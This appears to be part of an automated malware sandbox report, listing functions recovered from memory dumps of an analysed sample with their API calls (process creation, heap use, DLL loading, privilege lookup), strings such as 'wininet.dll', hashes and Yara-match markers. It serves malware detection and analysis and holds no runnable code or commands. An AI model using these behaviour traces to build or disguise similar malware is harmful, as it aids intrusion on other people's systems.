Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78fb58b8056a762f333b9df49247edb3c6e747d2208ea9922e1080ee23745406
Instruction ID: f23573b11227f759f4bf89063028d167374eee013707e4a178edaac39c1cb08d
Opcode Fuzzy Hash: 78fb58b8056a762f333b9df49247edb3c6e747d2208ea9922e1080ee23745406
Instruction Fuzzy Hash: 639002E12021010361067159441461A411BD7E0245B61C021E5015591DC565E8D17169

Uniqueness

Uniqueness Score: -1.00%

Function 04C49540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C4954A

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50ece988cf1083925c95e7c60e5815e6581c1c7cd30203e020467fd6a70df858
Instruction ID: e1ca958c786a1f6f46d5c0512af33a7ad6e47ab68330fcaab0b6f3211fbd3cb5
Opcode Fuzzy Hash: 50ece988cf1083925c95e7c60e5815e6581c1c7cd30203e020467fd6a70df858
Instruction Fuzzy Hash: E49002A5211101032106A559070450B0157D7D5395361C021F5016551CD661E8E16165

Uniqueness

Uniqueness Score: -1.00%

Function 04C496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C496DA

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0bf0e760f8ed7db2852ebb66a1de06f06e2b2de60b0fd6a6378df011c7382b16
Instruction ID: 8a7c5e03eefeef876c25fb9c0e989b9e46fb53771830d8e8a29a565da4af3fc1
Opcode Fuzzy Hash: 0bf0e760f8ed7db2852ebb66a1de06f06e2b2de60b0fd6a6378df011c7382b16
Instruction Fuzzy Hash: 669002B120110943F10161594404B4A0116D7E0345F61C016A4125655D8655E8D17565

Uniqueness

Uniqueness Score: -1.00%

Function 04C496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C496EA

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b77022eedfcf0bdb0e07dd93b5fd874e8ec9ab85116a5447257f1e3a1326b031
Instruction ID: 437811783c6f21bd4440fd45752c69a88849af91fdfe669b4756d107a9f66617
Opcode Fuzzy Hash: b77022eedfcf0bdb0e07dd93b5fd874e8ec9ab85116a5447257f1e3a1326b031
Instruction Fuzzy Hash: C39002B120118903F1116159840474E0116D7D0345F65C411A8425659D86D5E8D17165

Uniqueness

Uniqueness Score: -1.00%

Function 04C49650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C4965A

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12563685b4f578586b34384cdc73a0035d9dd4ac41d0223826bb762e9a76b69e
Instruction ID: cbea28cac3b71919ce4fb991c8c3f846ccf2c99505fa7cb846d4948562d33b78
Opcode Fuzzy Hash: 12563685b4f578586b34384cdc73a0035d9dd4ac41d0223826bb762e9a76b69e
Instruction Fuzzy Hash: F39002B120514943F14171594404A4A0126D7D0349F61C011A4065695D9665EDD5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 04C49660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C4966A

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99f640d2575481df733c1306f3a2dd27b01ffa094e9b15c28ea30d7db6d1ea02
Instruction ID: 7de722e4cddcc160144f52ad8b0516c7fe15f7e34b86b043d379a539bf12b021
Opcode Fuzzy Hash: 99f640d2575481df733c1306f3a2dd27b01ffa094e9b15c28ea30d7db6d1ea02
Instruction Fuzzy Hash: 3C9002B120110903F1817159440464E0116D7D1345FA1C015A4026655DCA55EAD977E5

Uniqueness

Uniqueness Score: -1.00%

Function 04C49FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C49FEA

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 84dff260e516774e01ae5e1217f415d6ffd5254b11ac9da1a9ce598ec6662708
Instruction ID: 9e30564988dcab5893acc157969512e7a61283700c364ad0e4112db368dfe0eb
Opcode Fuzzy Hash: 84dff260e516774e01ae5e1217f415d6ffd5254b11ac9da1a9ce598ec6662708
Instruction Fuzzy Hash: DE9002B131124503F1116159840470A0116D7D1245F61C411A4825559D86D5E8D17166

Uniqueness

Uniqueness Score: -1.00%

Function 04C49780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C4978A

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d47f38351fd4b54e84f550f61adbabf798efebe380828e34b827d8426dc23710
Instruction ID: 9fcd6db50544c5618249f8b5f6af93bd338e8d320aa1c24c9486d0b8daa0010c
Opcode Fuzzy Hash: d47f38351fd4b54e84f550f61adbabf798efebe380828e34b827d8426dc23710
Instruction Fuzzy Hash: AA9002A921310103F1817159540860E0116D7D1246FA1D415A4016559CC955E8E96365

Uniqueness

Uniqueness Score: -1.00%

Function 04C49710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C4971A

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b977401fa92ccdc1e1c93c368781d88058d87f73541b5d909619a5f76cbd06e2
Instruction ID: f0a83cf8c175b86101c23c9ff5f4063502ba05ce4cc898795c02907fc8e8969c
Opcode Fuzzy Hash: b977401fa92ccdc1e1c93c368781d88058d87f73541b5d909619a5f76cbd06e2
Instruction Fuzzy Hash: 919002B120110503F1016599540864A0116D7E0345F61D011A9025556EC6A5E8D17175

Uniqueness

Uniqueness Score: -1.00%

Function 04C49840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C4984A

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: daca315a054ef4b8c19a4a5424d202b16a434636578333e808674a837db77084
Instruction ID: 9bf1b8cecde3d1c5a631f1b2cea95a676d698a456030070555d304239efd6ace
Opcode Fuzzy Hash: daca315a054ef4b8c19a4a5424d202b16a434636578333e808674a837db77084
Instruction Fuzzy Hash: 6A9002A1242142537546B159440450B4117E7E02857A1C012A5415951C8566F8D6E665

Uniqueness

Uniqueness Score: -1.00%

Function 04C49860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C4986A

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6770d1129c01cba5d5e14aef9fbe599ff7b47f5bf30e67ed2789b0ed65af0b91
Instruction ID: 6ce705d77ade7e370f75417c91269620cde6a5299c0a4149ca273691262e14cb
Opcode Fuzzy Hash: 6770d1129c01cba5d5e14aef9fbe599ff7b47f5bf30e67ed2789b0ed65af0b91
Instruction Fuzzy Hash: B89002B120110513F1126159450470B011AD7D0285FA1C412A4425559D9696E9D2B165

Uniqueness

Uniqueness Score: -1.00%

Function 04C499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C499AA

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a1adc6b42f7240bf6703a242348079a42d3504960329ed7d224ea576b76e3561
Instruction ID: ab1f413ea9950e51946a373b8000ce82f1da923df28067529771ffddc16e7860
Opcode Fuzzy Hash: a1adc6b42f7240bf6703a242348079a42d3504960329ed7d224ea576b76e3561
Instruction Fuzzy Hash: 019002E134110543F10161594414B0A0116D7E1345F61C015E5065555D8659ECD2716A

Uniqueness

Uniqueness Score: -1.00%

Function 04C49910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C4991A

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f139cfdc5134e8b71ad1b100a41985f191d430badd41b5aca18f23c4eef74bd4
Instruction ID: 828eb8f61c95ed42794dd4f694ad21e138732b16cdcd51046e1ca5d332329b0b
Opcode Fuzzy Hash: f139cfdc5134e8b71ad1b100a41985f191d430badd41b5aca18f23c4eef74bd4
Instruction Fuzzy Hash: 669002F120110503F1417159440474A0116D7D0345F61C011A9065555E8699EDD576A9

Uniqueness

Uniqueness Score: -1.00%

Function 04C49A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C49A5A

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5fbb80abf7a9e1fca46d524b0144dafc23f74850152aee5f6f875aeccaa0a59c
Instruction ID: 33d15a5b28b6e6319aca1b4461d1022521f2b624fde45ae7d1472af0dd99747f
Opcode Fuzzy Hash: 5fbb80abf7a9e1fca46d524b0144dafc23f74850152aee5f6f875aeccaa0a59c
Instruction Fuzzy Hash: 9D9002A121190143F20165694C14B0B0116D7D0347F61C115A4155555CC955E8E16565

Uniqueness

Uniqueness Score: -1.00%

Function 009684C2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00963516,?,00963C8F,00963C8F,?,00963516,?,?,?,?,?,00000000,00000000,?), ref: 009684BD
RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00953B93), ref: 009684FD

Strings

.z`, xrefs: 009684EC, 009684F8

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: .z`
API String ID: 2488874121-1441809116
Opcode ID: 2e08841373829c47710482ed1e1741878272d1eb79a7c0b82963ea5ab7b72975
Instruction ID: 12d85c5e156508bcaac3f7e55abb8c5543b345e65a35b04d512d1051c0104c70
Opcode Fuzzy Hash: 2e08841373829c47710482ed1e1741878272d1eb79a7c0b82963ea5ab7b72975
Instruction Fuzzy Hash: AD118FB52043446FDB24EF789C85EE77B6CAF84350F158A99F9585B282CA31E9148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00966EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00966F88

Strings

net.dll, xrefs: 00966F51, 00966FD7, 00966FAF, 00966FBB, 00966FE3
wininet.dll, xrefs: 00966F3E, 00966F47

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: dcdc39c7c6c693788b8ef11d0ded37d5dd7c33f95ecf2803788eda0e636ba227
Instruction ID: f925311727a6c335df19136e1aac7840bf9181f4ad28ed749f1023a7bfeec736
Opcode Fuzzy Hash: dcdc39c7c6c693788b8ef11d0ded37d5dd7c33f95ecf2803788eda0e636ba227
Instruction Fuzzy Hash: 5531AFB1602304BBD725DF68D8A1FA7B7B8FB88700F00841DF65A9B241D774A945CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00966ED8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00966F88

Strings

net.dll, xrefs: 00966F51, 00966FAF, 00966FBB
wininet.dll, xrefs: 00966F3E, 00966F47

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 7d1f6c0b56000aab435350c906b82ec0804eea0402af7d4b0a97759bc6155d8b
Instruction ID: ccfa7dd5172ee8459702a99f6ea5c2ce564bd4c8f1f20eadece2f89266a5270c
Opcode Fuzzy Hash: 7d1f6c0b56000aab435350c906b82ec0804eea0402af7d4b0a97759bc6155d8b
Instruction Fuzzy Hash: F921A0B1602300ABD710DF68D8A1FABBBB8EF88700F10816DF6199B241D774A445CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 009684D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00953B93), ref: 009684FD

Strings

.z`, xrefs: 009684EC, 009684F8

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 849b13ab4691bd2f3caf1a81750ed95b173cdcd4240517dd669a34c195963be3
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 74E04FB12002046BD714DF59CC49EA777ACEF88750F014554FD0857281CA30F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 009572E6, Relevance: 3.2, APIs: 2, Instructions: 170threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009572BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009572DB

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e7bb93f3fead16ab1e1905c706e71cb6153d9c042cf7074951291ca1487f7e8a
Instruction ID: 25eaf310c9c571d6419a89a70d5eefe18b783828047f8854c61c349eb089efb6
Opcode Fuzzy Hash: e7bb93f3fead16ab1e1905c706e71cb6153d9c042cf7074951291ca1487f7e8a
Instruction Fuzzy Hash: 6A51A3B19042099FDB15DF65EC86FEBB7ECEB48304F00046EF95997241DB70AA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00957260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009572BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009572DB

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: a0df537031b5e3e0b2c043e05cb10936a23efaa6823f12feed4dba74c263469f
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: 2D01DB31A8032877F721E6959C03FFEB76C9B40B51F154119FF04BA1C1E6A46A0A47F6

Uniqueness

Uniqueness Score: -1.00%

Function 00959B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00959B92

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 63b89422a368b64bbcd94fcbeef495b2db45f29fe1c17bf625f39a7a62e8e82d
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 1B01DEB5D4020DBBEF10DBA5EC42F9DB7BC9B54309F044195AD08A7241F671EB58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0096853F, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00968594

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 1c82e746d4481240481cbf3aa9af8f681f6b6e8cf17f5e3e3d0c0a1773f4a7dc
Instruction ID: 3e7c0ff6b1c7b8fa5772a908c918e1789d7ec75ceaa9f9d456f78a8b262a4d4b
Opcode Fuzzy Hash: 1c82e746d4481240481cbf3aa9af8f681f6b6e8cf17f5e3e3d0c0a1773f4a7dc
Instruction Fuzzy Hash: B0019DB2200108AFCB54CF99DC81EEB77A9AF8C354F158258FA0DA7241CA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00968540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00968594

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: cdaf16e1634009c9f94746cdb6271ff2b947e8b3a6b78e3e031d2636e76d04e7
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 0301AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00967010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0095CCD0,?,?), ref: 0096704C

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
Instruction ID: 8edaf0aab664912949beb646ad1ac69c81d47a32368e34f02c1276f49abfe12a
Opcode Fuzzy Hash: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
Instruction Fuzzy Hash: C6E06D333912043AE23065999C02FA7B39C8B81B24F550026FA0DEA2C1D595F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00968502, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00963516,?,00963C8F,00963C8F,?,00963516,?,?,?,?,?,00000000,00000000,?), ref: 009684BD

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2f47358c6bc0a9843cedaf3362f5c7a73c7227a79b138902d56ed0688e8d817b
Instruction ID: b5e02da8870dfbe1c5ec7cd8b43ac85da0f98eca7aea6d22f5cb4a3d1a298954
Opcode Fuzzy Hash: 2f47358c6bc0a9843cedaf3362f5c7a73c7227a79b138902d56ed0688e8d817b
Instruction Fuzzy Hash: E7E0D8772013146BD624EFA89C85FD337ACDF887A0F108569F54D97641C971EA0187F1

Uniqueness

Uniqueness Score: -1.00%

Function 00968490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00963516,?,00963C8F,00963C8F,?,00963516,?,?,?,?,?,00000000,00000000,?), ref: 009684BD

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 793be5c5c330c8dffe94c992d56e168b8af5b7120e82c49566a294ff41b6764b
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: ECE046B1200208ABDB14EF99CC45EA777ACEF88750F118558FE085B282CA30F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0095D408, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00957C63,?), ref: 0095D43B

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8d7a406cacd26dc5071dc478b01968cbec676e1f5b3f9b645616045c8e4f7dbc
Instruction ID: ca468a88342edbcff05a78005271f1600ea89b825797201a2918f979157d44b5
Opcode Fuzzy Hash: 8d7a406cacd26dc5071dc478b01968cbec676e1f5b3f9b645616045c8e4f7dbc
Instruction Fuzzy Hash: 73E0C2753903003BE720EFA58C03F1A7299AB91B01F084068FA0ADB3C3DA20D6018661

Uniqueness

Uniqueness Score: -1.00%

Function 00968630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0095CFA2,0095CFA2,?,00000000,?,?), ref: 00968660

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: d298f20b40714df3a8cf89043f2301555a809426bd0587542f4c3c7c993cc966
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 29E01AB12002086BDB10DF49CC85EE737ADAF88650F018554FA0857281C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00968634, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0095CFA2,0095CFA2,?,00000000,?,?), ref: 00968660

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 95edc98251146c3eae3d976603692798308fa1a3d9a6a8ebd5aa79df187121b2
Instruction ID: 04adc1f3794b20de9f57630506a6652e99aed207a94d88e7cf43681c7290d473
Opcode Fuzzy Hash: 95edc98251146c3eae3d976603692798308fa1a3d9a6a8ebd5aa79df187121b2
Instruction Fuzzy Hash: 7DE0C2B52042546BDB10DF55DC85FD73BACDF85250F148A99FC8D5B242C930E814CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0095D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00957C63,?), ref: 0095D43B

Memory Dump Source

Source File: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 919326ec742cafec1455fd726ab819bb1a83fb6508fe91f3ffa22c061f70dbca
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: FED05E617503043BE610EAA89C03F26328C5B54B00F494064F949963C3D960E5004561

Uniqueness

Uniqueness Score: -1.00%

Function 04C4967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C49694

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9bf041f35b7465a1f0ad0da61540576f4508c668454ef835289fb91df07d028
Instruction ID: 9b1036298cf12d674c180dc65e1362c0a3ca476d5d127962dbcade52dfd89538
Opcode Fuzzy Hash: f9bf041f35b7465a1f0ad0da61540576f4508c668454ef835289fb91df07d028
Instruction Fuzzy Hash: C4B09BF19425D5C6F751D770470871B7A11B7D0745F26C055D1030641A4778E1D1F5B5

Uniqueness

